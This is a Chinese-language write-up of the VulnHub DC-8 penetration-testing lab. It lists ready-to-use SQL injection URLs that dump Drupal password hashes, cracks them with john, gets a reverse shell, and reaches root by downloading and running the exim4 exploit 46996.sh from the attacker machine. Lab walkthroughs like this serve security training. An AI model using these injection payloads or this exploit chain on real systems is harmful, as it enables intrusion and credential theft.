标签:sql注入、Drupal CMS、反弹shell、exim提权
0x00 环境准备
下载地址:https://www.vulnhub.com/entry/dc-8,367/
flag数量:1
攻击机:kali
攻击机地址:192.168.1.31
靶机描述:
DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.
The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.
The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.
You probably wouldn't even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it's definitely there and doing it's job.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
0x01 信息搜集
1.探测靶机地址
命令:arp-scan -l
靶机地址是192.168.1.37
2.探测靶机开放端口
命令:nmap -sV -p- 192.168.1.37
开放了22和80端口,先看一下80端口
又是熟悉的drupal cms
0x02 SQL注入
点击左侧的链接,发现有个nid参数
可能存在sql注入,fuzz一下看看是否存在注入
是个数字型的显错注入
数据库:http://192.168.1.37/?nid=1.1 union select database() --+
数据表:http://192.168.1.37/?nid=1.1 union select group_concat(table_name) from information_schema.tables where table_schema='d7db' --+
里面有个users表,查询一下这个表:http://192.168.1.37/?nid=1.1 union select group_concat(column_name) from information_schema.columns where table_name='users' --+
查询一下用户名和密码:
用户名:http://192.168.1.37/?nid=1.1 union select group_concat(name) from users --+
密码:http://192.168.1.37/?nid=1.1 union select group_concat(pass) from users --+
| 用户名 | 密码 |
|---|---|
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
0x03 john破解哈希值
将上面查询出来的用户名和密码保存到文件里
使用john工具进行爆破,命令:john users.txt
爆破出来了john的密码,但是没有admin的密码。jonh \ turtle
0x04 反弹shell
有了账号和密码,那就去后台登录一下。drupal默认后台:192.168.1.37/user
登录成功,由于不是admin权限,只能修改一个页面
写入一句话
没法连接到shell,那就反弹一个shell吧
在contact us页面随便填一下,然后提交
反弹成功,输入命令:python -c "import pty;pty.spawn('/bin/bash')"
0x05 提权
使用find命令查找具有suid权限的命令:find / -user root -perm -4000 -print 2>/dev/null
发现exim4命令,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限。
查看exim版本,命令:/usr/sbin/exim4 --version
查找exim漏洞,命令:searchsploit exim
将脚本文件复制下来
在kali上开启临时http服务,以便让靶机能下载脚本文件,命令:python -m SimpleHTTPServer
在靶机上下载脚本文件并赋予权限:
在靶机上执行脚本文件:
但是不能执行,一直报错。
我查了一下原因是:这里的46996.sh文件的格式为dos格式。而linux只能执行格式为unix格式的脚本。要想执行46996.sh文件,需要修改文件format为unix。在kali中执行vi 46996.sh,然后输入:set ff=unix
然后在靶机上把刚才下载的46996.sh删掉,重新下载一遍:
执行命令:./46996.sh -m netcat
现在是root权限了,但是这个权限不稳定,所以这里需要再反弹一个shell。监听7777端口接收到了反弹的shell
flag在/root目录下
由于我不会每天都登录,所以有什么私信或者评论我都不能及时回复,如果想要联系我最好给我发邮件,邮箱:Z2djMjUxMTBAMTYzLmNvbQ==,如果发邮件请备注“”
参考链接
1.Vulnhub靶机实战——DC-8
2.VulnHub—DC-8
3.shell脚本报错:-bash: xxx: /bin/bash^M: bad interpreter: No such file or directory